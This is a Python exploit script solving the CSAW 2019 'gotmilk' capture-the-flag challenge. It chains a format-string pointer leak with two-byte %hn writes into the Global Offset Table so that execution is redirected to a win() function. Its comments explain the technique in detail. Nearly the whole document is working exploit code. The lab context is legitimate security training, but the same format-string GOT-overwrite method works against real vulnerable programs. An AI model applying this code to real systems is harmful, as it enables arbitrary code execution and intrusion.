CSAW 2019 gotmilk solution
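#!/usr/bin/env python2
"""CSAW CTF 2019 quals, pwn/gotmilk -- two-stage format-string GOT overwrite.

The service prints "GOT milk? ", reads a line (fgets) and hands it straight
to a printf-style call, so a single format string can both read and write
memory.  The binary is 32-bit and not PIE (fixed GOT address below), and the
technique only works because its GOT is writable (no full RELRO).

  stage 1  leak the pointer stored in lose@GOT with %8$s and, in the same
           format string, overwrite that slot two bytes at a time
           (%7$hn / %8$hn) with the address of the instruction after the
           call to lose(), so the next lose() call lands back in the
           fgets/printf path instead of exiting.
  stage 2  rebase win() from the leaked lose() address and write it into
           lose@GOT (%4$hn / %5$hn -- the argument indexes differ from
           stage 1, presumably because the second printf runs in a
           different stack frame after the redirect), so the following
           lose() call executes win().

Every "%Nd" width is the target half-word minus a hand-tuned constant
(-31, -13, -15, -16).  %hn stores the number of bytes printf has emitted so
far, so those constants have to equal the exact number of literal bytes that
precede each %hn -- for stage 1 that includes however many bytes the %8$s
leak prints before hitting a NUL.  They are tuned against one specific build
of the challenge; re-derive them if the binary or the library changes.

Remote target was: nc pwn.chal.csaw.io 1005
"""
from __future__ import print_function

from pwn import *

# Offsets of win()/lose() inside the shared object that lose@GOT points into
# (presumably the challenge's libmylib.so, see the local branch below; the
# values are far too small to be glibc offsets).  Re-read them with
# `nm -D <lib>` if the library changes.
win_offset = 0x00001189
lose_offset = 0x000011f8

# Only used when the target is started under gdb via elf.debug().
context.terminal = ['/usr/bin/gnome-terminal', '-e']

# lose@GOT in the main binary, packed as the two little-endian pointers the
# %hn writes target: low half at +0, high half at +2.
lose_addr = p32(0x804a010)
lose_addr_2 = p32(0x804a012)

# Address of the instruction right after the call to lose(); stage 1 points
# lose@GOT here so that we get a second fgets/printf round.
afterladdr = 0x0804867e

# Where to run: set local = True to spawn ./gotmilk from the current
# directory (libmylib.so next to it); otherwise connect to host:port.
local = False
host = '0.0.0.0'   # original remote: 'pwn.chal.csaw.io'
port = 2020        # alternative in the original: 1004


def connect():
    """Return a pwntools tube to the target, local process or remote socket."""
    if local:
        elf = ELF('./gotmilk')
        # To debug: return elf.debug(gdbscript='c')
        return elf.process()
    return remote(host, port)


def _check_widths(*widths):
    """Abort if any "%Nd" width is not positive.

    A non-positive width means the two target half-words are ordered the
    other way round than the tuned arithmetic assumes; printf would treat a
    negative width as left-justification and the %hn writes would store the
    wrong values into the GOT.  Failing here is better than corrupting it.
    """
    for width in widths:
        if width <= 0:
            log.error('format width %d is not positive; target halves are '
                      'ordered differently than the tuned offsets assume' % width)


def stage1_payload():
    """Format string that leaks lose@GOT and redirects it to afterladdr.

    Layout of the 99-byte buffer (underscores are filler printf echoes):
      [0:4]   argument 7: lose@GOT + 2, high half, written by %7$hn
      [4:8]   argument 8: lose@GOT,      read by %8$s, then written by %8$hn
    The "|...|" around %8$s delimit the leak in the echoed output.

    NOTE: list-slice assignment with a string whose length differs from the
    slice shrinks or grows the list and shifts every later index; the tuned
    constants depend on the exact widths that result, so do not "tidy"
    these assignments.
    """
    allower = afterladdr & 0xFFFF
    alupper = (afterladdr >> 16) & 0xFFFF
    offset_1 = (alupper - 31)
    offset_2 = (allower - alupper - 13)
    _check_widths(offset_1, offset_2)

    payload = list("_" * 99)
    payload[0:4] = lose_addr_2
    payload[4:8] = lose_addr
    payload[8:15] = "%" + str(offset_1) + "d"
    payload[15:21] = "|%8$s|"
    payload[25:30] = "%7$hn"
    payload[35:42] = "%" + str(offset_2) + "d"
    payload[50:55] = "%8$hn"
    return ''.join(payload)


def stage2_payload(target_addr):
    """Format string that writes ``target_addr`` (win) into lose@GOT.

    Layout: [0:4] argument 4: lose@GOT (low half, %4$hn),
            [4:8] argument 5: lose@GOT + 2 (high half, %5$hn).
    The low half is written first here, the reverse of stage 1, so the
    second width is (high - low) minus the bytes emitted in between.
    Same caveat as stage1_payload about slice lengths.
    """
    tlower = target_addr & 0xFFFF
    tupper = (target_addr >> 16) & 0xFFFF
    offset_1 = (tlower - 15)
    offset_2 = (tupper - tlower - 15 - 1)
    log.info('stage 2 widths: %d, %d' % (offset_1, offset_2))
    _check_widths(offset_1, offset_2)

    payload = list("_" * 99)
    payload[0:4] = lose_addr
    payload[4:8] = lose_addr_2
    payload[8:15] = "%" + str(offset_1) + "d"
    payload[21:28] = "|%4$hn|"
    payload[35:42] = "%" + str(offset_2) + "d"
    payload[50:55] = "%5$hn"
    return ''.join(payload)


def main():
    """Run both stages against the target and drop into an interactive shell."""
    p = connect()
    try:
        # Keep a copy of what was sent (e.g. to replay under gdb).
        with open('payload', 'w') as fp:
            payload = stage1_payload()
            log.info('sending stage 1: %r' % payload)
            fp.write(payload)
            pause()  # checkpoint: attach a debugger here if needed
            p.recvuntil('GOT milk? ')
            p.sendline(payload)

            # The echo contains "|<leak>|".  %s prints the bytes at lose@GOT
            # up to the first NUL, which is usually more than the pointer
            # itself, so only the first four bytes are the address.  Using
            # recvuntil/recvn instead of a timed recv() avoids parsing a
            # partial read.
            if not p.recvuntil('|', timeout=5):
                log.error('no leak delimiter in the echoed output')
            leak = p.recvn(4, timeout=5)
            if len(leak) != 4:
                log.error('short leak: %r' % leak)
            loss_addr = u32(leak)
            base = loss_addr - lose_offset
            # The load base of a shared object is page aligned.  Anything
            # else means lose@GOT did not hold a resolved pointer into the
            # library (for instance the PLT stub before the first call), and
            # writing base + win_offset into the GOT would only crash it.
            if base & 0xfff:
                log.error('leak %#x gives unaligned base %#x; GOT slot was '
                          'probably not resolved yet' % (loss_addr, base))
            target_addr = base + win_offset
            log.info('lose = %#x, base = %#x, win = %#x'
                     % (loss_addr, base, target_addr))

            payload = stage2_payload(target_addr)
            log.info('sending stage 2: %r' % payload)
            fp.write("\n" + payload + "\n")
            p.sendline(payload)

        # Whatever the redirected lose() -> win() prints shows up here.
        p.interactive()
    finally:
        p.close()


if __name__ == '__main__':
    main()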